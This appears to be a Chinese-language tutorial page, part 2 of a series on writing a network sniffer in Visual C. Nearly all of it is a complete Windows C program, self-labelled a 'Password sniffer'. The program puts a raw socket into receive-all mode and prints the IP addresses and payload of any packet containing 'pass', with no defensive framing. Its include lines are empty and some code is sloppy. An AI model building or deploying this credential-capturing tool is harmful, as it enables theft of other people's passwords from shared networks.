Visual C 制作一个Sniffer实例(2)

#include 

#include 

#include 

#include 

#include "ws2tcpip.h"

#define MAX_PACK_LEN 4096 //接收的最大IP报文

#define MAX_ADDR_LEN 16 // 点分十进制地址的最大长度

#define MAX_HOSTNAME_LAN 255 //最大主机名长度

typedef struct _iphdr

{

　unsigned char h_lenver; //4位首部长度+4位IP版本号

　unsigned char tos; //8位服务类型TOS

　unsigned short total_len; //16位总长度（字节）

　unsigned short ident; //16位标识

　unsigned short frag_and_flags; //3位标志位

　unsigned char ttl; //8位生存时间 TTL

　unsigned char proto; //8位协议 (TCP, UDP 或其他)

　unsigned short checksum; //16位IP首部校验和

　unsigned int sourceIP; //32位源IP地址

　unsigned int destIP; //32位目的IP地址

}IP_HEADER;

SOCKET SockRaw; 

int DecodeIpPack(char *,int); //IP解包函数

void CheckSockError(int,char*);//SOCK错误处理函数
void main(int argc, char ** argv)

{

　int iErrorCode;

　char RecvBuf[MAX_PACK_LEN] = {0};

　WSADATA wsaData;

　char name[MAX_HOSTNAME_LAN];

　struct hostent * pHostent;

　SOCKADDR_IN sa;

　DWORD dwBufferLen [10];

　DWORD dwBufferInLen = 1;

　DWORD dwBytesReturned = 0;
　if(argc!=1)

　{

printf("Password sniffer written by Wu.\n\n");

printf("Usage:");

printf("\tsniffer.exe \n");

exit(0);

　}

　printf("It's now sniffing,CTRL+C to exit...\n\n");

　//初始化SOCKET,建立一个原始套接字

　iErrorCode = WSAStartup(0x0202,&wsaData);

　CheckSockError(iErrorCode, "WSAStartup");

　SockRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP);

　CheckSockError(SockRaw, "socket");

　//获取本机IP地址

　iErrorCode = gethostname(name, MAX_HOSTNAME_LAN);

　CheckSockError(iErrorCode, "gethostname");

　pHostent = (struct hostent * )malloc(sizeof(struct hostent));

　pHostent = gethostbyname(name);

　sa.sin_family = AF_INET;

　sa.sin_port = htons(6000);

　memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length);

　//绑定套接字

　iErrorCode = bind(SockRaw, (PSOCKADDR)&sa, sizeof(sa));

　CheckSockError(iErrorCode, "bind");

　//设置SOCK_RAW为SIO_RCVALL，以便接收所有的IP包

　iErrorCode=WSAIoctl(SockRaw, SIO_RCVALL,&dwBufferInLen, sizeof(dwBufferInLen),

　&dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL );

　CheckSockError(iErrorCode, "Ioctl");

　//侦听IP报文

　while(1)

　{

memset(RecvBuf, 0, sizeof(RecvBuf));

iErrorCode = recv(SockRaw, RecvBuf, sizeof(RecvBuf), 0);

CheckSockError(iErrorCode, "recv");

iErrorCode = DecodeIpPack(RecvBuf, iErrorCode);//对收到的IP包进行解包

CheckSockError(iErrorCode, "Decode");

　}

}

//IP解包程序

int DecodeIpPack(char *buf, int iBufSize)

{

　IP_HEADER *pIpheader;

　char *SearchPass;

　int iIphLen, iTTL;

　char szSourceIP[MAX_ADDR_LEN], szDestIP[MAX_ADDR_LEN];

　SOCKADDR_IN saSource, saDest;

　pIpheader = (IP_HEADER *)buf;

　//获取源IP地址

　saSource.sin_addr.s_addr = pIpheader->sourceIP;

　strncpy(szSourceIP, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN);

　//获取目标IP地址

　saDest.sin_addr.s_addr = pIpheader->destIP;

　strncpy(szDestIP, inet_ntoa(saDest.sin_addr), MAX_ADDR_LEN);

　iTTL = pIpheader->ttl;

　//计算IP包头长度

　iIphLen = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf);

　SearchPass = buf + iIphLen + 20 ;

　//如果抓到密码就输出

　if(strstr(SearchPass,"pass")||strstr(SearchPass,"Pass")||strstr(SearchPass,"PASS"))

　{

printf("\n\n%s->%s ", szSourceIP, szDestIP); //输出源计算机和目的计算机的IP地址

printf("bytes=%d TTL=%d \n",iBufSize,iTTL);

printf("%s",SearchPass);

　}

　return 0;

}

//SOCK错误处理程序

void CheckSockError(int iErrorCode, char *pErrorMsg)

{

　if(iErrorCode==SOCKET_ERROR)

　{

printf("%s Error:%d\n", pErrorMsg, GetLastError());

closesocket(SockRaw);

exit(0);

　}

}